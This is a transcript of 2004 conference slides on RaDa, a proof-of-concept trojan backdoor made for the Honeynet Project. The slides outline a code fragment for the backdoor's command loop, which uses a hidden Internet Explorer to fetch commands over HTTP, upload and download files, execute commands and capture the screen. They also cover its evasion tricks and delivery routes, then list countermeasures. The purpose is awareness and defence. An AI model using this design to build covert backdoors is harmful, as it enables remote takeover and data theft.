0
RaDa: a “new” trojan backdoor  Jorge Ortiz & Raúl Siles  jorge.ortiz@hp.com           raul.siles@hp.com        FIST Confer...
Agenda• Introduction• Healthy Environment• Remote Control (RaDa Demo)• One step beyond• Getting it in• Countermeasures    ...
Intro• Awareness on trojans for remote control  & protection measures.• Most concepts are based in Setiri  (R.Temmingh & H...
A healthy environment• You have done a pretty good job:  – Policy & procedures  – Firewall (ingress and egress filters)  –...
A healthy environment           Internet  Router                                ProxyFirewall                             ...
Remote Control• Let’s think for a minute that the  intruder has been able to install a  program.• We shall cover this late...
Remote Control: implementation• RaDa:  – Very easy to do  – A lot of Cut&Paste code (Google    knows how to do it!)  – Vis...
RaDa: implementationSub RaDa_Run()   Load commands file              Loop through the commands  Set oExplorer =           ...
RaDa: How It Works                              1.   Intruder publishes order                              2.   RaDa opens...
Demo           RaDa: Command Exec                              1. RaDa/IE retrieves                                 comman...
Demo           RaDa: File Download                              1. RaDa/IE retrieves                                 comma...
Demo           RaDa: Screen Capture                              1. RaDa/IE retrieves                                 comm...
Demo           RaDa: File Upload                            1. RaDa/IE retrieves                               command fro...
Demo     RaDa: hiding techniques• No application in Task Manager• Process name• Packed• HTTP through IE using HTML• Mislea...
One Step Beyond• Strong authentication of commands  (GPG)• Blog/Wiki• Multiagent management Console• Other channels (mail,...
Getting it in• Zero day exploit• Ask for help:  – Mail attachment  – Download  – Social engineering• Insider            Ra...
Countermeasures• User awareness• Baselines (processes, memory…)• Restrict web access• Update AV signatures frequently.• Si...
Scan of the Month• Goal:  – Improve the Windows reverse    engineering malware state of the art• Honeynet Project:  – http...
That’s all folks• Thank you!• Any questions?       FIST Conference Octubre/Madrid 2004           RaDa: a “new” trojan back...
Attribution-NonCommercial-               NoDerivs 2.0You are free:to copy, distribute, display, and perform the workUnder ...
Upcoming SlideShare
Loading in...5
×

Malware RADA

207

Published on

Published in: Technology
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total Views
207
On Slideshare
0
From Embeds
0
Number of Embeds
1
Actions
Shares
0
Downloads
8
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

Transcript of "Malware RADA"

  1. 1. RaDa: a “new” trojan backdoor Jorge Ortiz & Raúl Siles jorge.ortiz@hp.com raul.siles@hp.com FIST Conference Octubre/Madrid 2004 RaDa: a “new” trojan backdoor 1
  2. 2. Agenda• Introduction• Healthy Environment• Remote Control (RaDa Demo)• One step beyond• Getting it in• Countermeasures RaDa: a “new” trojan backdoor 2
  3. 3. Intro• Awareness on trojans for remote control & protection measures.• Most concepts are based in Setiri (R.Temmingh & H.Meer. BH 2002)• Implemented by Raul Siles, David Perez & Jorge Ortiz• Honeynet Project SOTM in September (Thanks Lance and Ed!) RaDa: a “new” trojan backdoor 3
  4. 4. A healthy environment• You have done a pretty good job: – Policy & procedures – Firewall (ingress and egress filters) – IDS – Secure configurations – AV and Personal Firewalls• But problems appear… RaDa: a “new” trojan backdoor 4
  5. 5. A healthy environment Internet Router ProxyFirewall IDS Secure system RaDa: a “new” trojan backdoor 5
  6. 6. Remote Control• Let’s think for a minute that the intruder has been able to install a program.• We shall cover this later. RaDa: a “new” trojan backdoor 6
  7. 7. Remote Control: implementation• RaDa: – Very easy to do – A lot of Cut&Paste code (Google knows how to do it!) – Visual Basic, Perl… – Using the IE of the system – HTTP communications RaDa: a “new” trojan backdoor 7
  8. 8. RaDa: implementationSub RaDa_Run() Load commands file Loop through the commands Set oExplorer = (Input fields in the first Form) CreateObject("InternetExplore For Each Element In r.Application") oExplorer.Document.Forms(0).Elements oExplorer.Visible = 0 sCommandsURL = sServerURL & Select Case Element.Name "/" & sCommandsFile Case "exe" oExplorer.Navigate sCommandsURL vRetValue = CommandExe(Element.Value) Case "get“ vRetValue = CommandGet(Element.Value) Case "put“ Close Internet Explorer and vRetValue = CommandPut(Element.Value) release the object variable Case Else "oExplorer" Ignore unknown command oExplorer.application.Quit End Select Set oExplorer = Nothing Next ElementEnd Sub RaDa: a “new” trojan backdoor 8
  9. 9. RaDa: How It Works 1. Intruder publishes order 2. RaDa opens invisible IEIntruder Controller 3. IE sends GET to Ctrler 4. Ctrler sends command back to RaDa HTTP/HTTPS 5. RaDa execs command & sends response with POST 6. Intruder retrieves results from Ctrler RaDa: a “new” trojan backdoor 9
  10. 10. Demo RaDa: Command Exec 1. RaDa/IE retrieves command fromIntruder Controller Ctrler with GET 2. Parse page <input type=“text” name=“exe” value=“…”> 3. Exec command with Cmd.exe RaDa: a “new” trojan backdoor 10
  11. 11. Demo RaDa: File Download 1. RaDa/IE retrieves command fromIntruder Controller Ctrler with GET 2. Parse page <input type=“text” name=“get” value=“…”> 3. Download file from Ctrler with POST. 4. UUdecode and save it RaDa: a “new” trojan backdoor 11
  12. 12. Demo RaDa: Screen Capture 1. RaDa/IE retrieves command fromIntruder Controller Ctrler with GET 2. Parse page <input type=“text” name=“screenshot” value=“…”> 3. Capture screen with selected name RaDa: a “new” trojan backdoor 12
  13. 13. Demo RaDa: File Upload 1. RaDa/IE retrieves command fromIntruder Controller Ctrler with GET 2. Parse page <input type=“text” name=“put” value=“…”> 3. Send back contents with POST RaDa: a “new” trojan backdoor 13
  14. 14. Demo RaDa: hiding techniques• No application in Task Manager• Process name• Packed• HTTP through IE using HTML• Misleading info• VMWare detection RaDa: a “new” trojan backdoor 14
  15. 15. One Step Beyond• Strong authentication of commands (GPG)• Blog/Wiki• Multiagent management Console• Other channels (mail, dns, ping, ftp) RaDa: a “new” trojan backdoor 15
  16. 16. Getting it in• Zero day exploit• Ask for help: – Mail attachment – Download – Social engineering• Insider RaDa: a “new” trojan backdoor 16
  17. 17. Countermeasures• User awareness• Baselines (processes, memory…)• Restrict web access• Update AV signatures frequently.• Signed Executables• Behavioral vs. Signature analysis RaDa: a “new” trojan backdoor 17
  18. 18. Scan of the Month• Goal: – Improve the Windows reverse engineering malware state of the art• Honeynet Project: – http://www.honeynet.org/scans/ RaDa: a “new” trojan backdoor 18
  19. 19. That’s all folks• Thank you!• Any questions? FIST Conference Octubre/Madrid 2004 RaDa: a “new” trojan backdoor 19
  20. 20. Attribution-NonCommercial- NoDerivs 2.0You are free:to copy, distribute, display, and perform the workUnder the following conditions: Attribution. You must give the original author credit. Noncommercial. You may not use this work for commercial purposes. No Derivative Works. You may not alter, transform, or build upon this work.For any reuse or distribution, you must make clear to others the license terms of this work.Any of these conditions can be waived if you get permission from the author.Your fair use and other rights are in no way affected by the above.This is a human-readable summary of the http://creativecommons.org/licenses/by-nc-nd/2.0/. RaDa: a “new” trojan backdoor 20
  1. A particular slide catching your eye?

    Clipping is a handy way to collect important slides you want to go back to later.

×